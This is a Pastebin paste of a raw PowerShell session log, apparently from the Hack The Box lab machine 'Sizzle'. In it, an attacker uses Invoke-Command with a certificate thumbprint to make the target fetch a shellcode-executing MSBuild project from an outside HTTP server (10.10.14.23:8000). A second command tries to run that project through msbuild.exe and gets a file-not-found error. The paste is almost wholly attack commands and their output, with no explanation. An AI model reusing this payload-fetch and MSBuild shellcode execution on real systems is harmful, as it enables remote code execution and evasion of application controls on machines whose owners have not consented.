Advertisement
Guest User

ideleted

a guest
Jan 15th, 2019
229
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.86 KB | None | 0 0
  1. PS C:\Users\Administrator\Documents> Invoke-Command `
  2. >> -ComputerName sizzle.htb.local `
  3. >> -CertificateThumbprint 90eb15258d14e147ef9e1b43da4349f88d8acc9b `
  4. >> -ScriptBlock {
  5. >> Invoke-WebRequest -Method GET -Uri http://10.10.14.23:8000/shellcode.xml
  6. >> }
  7.  
  8.  
  9. StatusCode : 200
  10. StatusDescription : OK
  11. Content : <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  12. <!-- This inline task executes shellcode. -->
  13. <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30...
  14. RawContent : HTTP/1.0 200 OK
  15. Content-Length: 8390
  16. Content-Type: text/xml
  17. Date: Wed, 16 Jan 2019 02:51:23 GMT
  18. Last-Modified: Wed, 16 Jan 2019 02:29:34 GMT
  19. Server: SimpleHTTP/0.6 Python/3.7.2
  20.  
  21. <Project ToolsV...
  22. Forms : {}
  23. Headers : {Date, Last-Modified, Server, Content-Type...}
  24. Images : {}
  25. InputFields : {}
  26. Links : {}
  27. ParsedHtml : System.__ComObject
  28. RawContentLength : 8390
  29. PSComputerName : sizzle.htb.local
  30.  
  31.  
  32.  
  33. PS C:\Users\Administrator\Documents> Invoke-Command `
  34. >> -ComputerName sizzle.htb.local `
  35. >> -CertificateThumbprint 90eb15258d14e147ef9e1b43da4349f88d8acc9b `
  36. >> -ScriptBlock {
  37. >> cmd /K "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\amanda\Documents\shellcode.xml"
  38. >> }
  39. Microsoft (R) Build Engine version 4.6.1586.0
  40. [Microsoft .NET Framework, version 4.0.30319.42000]
  41. Copyright (C) Microsoft Corporation. All rights reserved.
  42.  
  43. MSBUILD : error MSB1009: Project file does not exist.
  44. Switch: C:\Users\amanda\Documents\shellcode.xml
  45.  
  46. C:\Users\amanda\Documents>
  47. PS C:\Users\Administrator\Documents>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement